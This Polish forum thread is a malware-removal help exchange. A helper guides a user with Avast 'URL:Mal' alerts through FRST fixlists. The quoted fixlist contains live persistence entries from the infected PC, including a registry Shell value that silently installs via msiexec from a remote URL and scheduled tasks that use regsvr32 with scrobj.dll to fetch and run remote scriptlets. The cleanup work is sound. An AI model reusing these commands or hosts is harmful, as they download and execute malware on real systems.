Komunikat Zarażenie URL:Mal w Opera

romero2000 · 29 Kwiecień 2017 12:42

Witam używam przeglądarki Opera i antywirusa Avast i od jakiegos czasu codziennie po kilka razy wyskakuje mi taki komunikat ze strony Avast

Addition.txt (43,1 KB)
FRST.txt (91,5 KB)

i nie mogę sobie poradzić z jego usunięciem,proszę o pomoc

Atis · 29 Kwiecień 2017 15:38

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses: HKU\S-1-5-21-3328882840-1447579214-1021428827-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1LF8U1MdH4Mdw2N8ZLNjH8OUZXFUFxMTZQFkZYNjYdFF== /q IFEO\taskmgr.exe: [Debugger] HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [Brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation) S2 AppleNotificationsSrv; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation) U3 idsvc; Brak ImagePath R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) 2017-04-29 02:02 - 2017-04-29 02:02 - 00000000 ____D C:\Users\dzidek\AppData\Local\NetworkTiles 2017-03-26 23:32 - 2017-03-26 23:32 - 49685376 _____ (Sony) C:\Users\dzidek\AppData\Local\pcc.exe 2017-04-18 21:21 - 2017-04-18 21:21 - 0000016 _____ () C:\ProgramData\mntemp 2017-04-13 15:29 - 2017-03-27 14:48 - 00000000 ____D C:\Users\dzidek\AppData\Roaming\ScreenShot C:\Program Files (x86)\ScreenShot C:\ProgramData\Apple Task: {074F2BBF-6275-4E2F-A71B-144B392DCABE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe Task: {0C970932-0E4C-40D5-956F-225EBA5904C5} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {0DE2CE03-4521-4F31-855E-D7A3F586A432} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe Task: {129198F8-72E8-4C2B-9F3B-A12B947A0923} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {12BD326F-A783-42DA-BC77-914BADD60DC0} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe Task: {17F98781-C5C3-4262-8059-436DA5282568} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {1FE8F44D-5155-4E16-99CA-8E46874C8B39} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe Task: {2D6A8932-F509-4628-966C-3ECEE225D414} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-04-14] () Task: {2E0ACC75-0744-4098-AB66-55633BA5B4F3} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe Task: {3A0379F6-E297-49AA-9E81-F601BABD77D1} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe Task: {3EBF8E44-5FD2-4E33-8BCF-64B4ACAF524D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {53C2D073-F676-44E0-BF84-6DF394E02A09} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe Task: {5D6A9DF5-FE04-4A46-A9F2-620C04C2011B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe Task: {5D8CE896-664D-4C18-916C-682A57EBF61A} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {8198903D-7141-4395-8DB4-2AC88629F8BB} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe Task: {89B0F611-B564-4904-BB4F-0270D172CE86} - System32\Tasks\e-pity2016a_styczen => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe Task: {8A59A315-6E9D-4BD6-A44B-71B3697511D0} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1LF8U1MdH4Mdw2N8ZLNjH8OUZXFUFxMTZQFkZYNjYdFF== scrobj.dll Task: {8ED0A8B9-95F9-4284-A1D6-6C8FFA2DF2CA} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {9D2AFF8B-A148-4610-8D96-25420A72BEEE} - System32\Tasks\e-pity2016a_kwiecien => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe Task: {C26757F5-B9AD-400E-830D-9397898E9FBC} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1LF8U1MdH4Mdw2N8ZLNjH8OUZXFUFxMTZQFkZYNjYdFF== scrobj.dll Task: {C45114E5-C3BC-4587-A146-68D652459EB7} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe Task: {CADF2FBF-FE45-4347-A898-36C18F5EA2EE} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {D0A451E9-D985-47AF-8285-603C3AE65B16} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe Task: {D6F6ED36-C160-4043-824C-180705190515} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe Task: {DDB43CD8-FC72-4AE4-B319-877481D1E69E} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {E5C54845-1911-476C-9E9B-EF8E6C5054E9} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe Task: {E8E07BF9-412A-4D2C-95F8-FC59A2779B65} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe Task: {EAA4CB71-2807-4076-8B34-D031787B1CF9} - System32\Tasks\{FFC2B96F-A18F-4E18-9CAC-4E02FE17A4CC} => pcalua.exe -a "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" Task: {F138396E-F1D9-4438-8D2C-C6295DB0AD2D} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe Task: {FD343037-1D27-40FF-90AF-A12A72D661F6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe Hosts: EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.

romero2000 · 30 Kwiecień 2017 10:32

Fixlog.txt (23,9 KB)
FRST.txt (101 bajtów)

Atis · 30 Kwiecień 2017 12:05

Nowy raport FRST jest pusty.

romero2000 · 30 Kwiecień 2017 12:22

FRST.txt (87,4 KB)

Atis · 30 Kwiecień 2017 13:58

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

C:\AdwCleaner DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK

romero2000 · 30 Kwiecień 2017 14:23

Dzięki wielkie za pomoc staram się i uważam z instalowaniem szczerze powiem nie wiem skąd się to wzięło pierwszy raz miałem z czymś takim doczynienia oprócz tego miałem jeszcze taki problem że odinstalowane przeglądarki same się na nowo instalowały (mozilla i Firefox) ale z tym sobie jakoś poradziłem,jeszcze raz wielkie dzięki.Pozdrawiam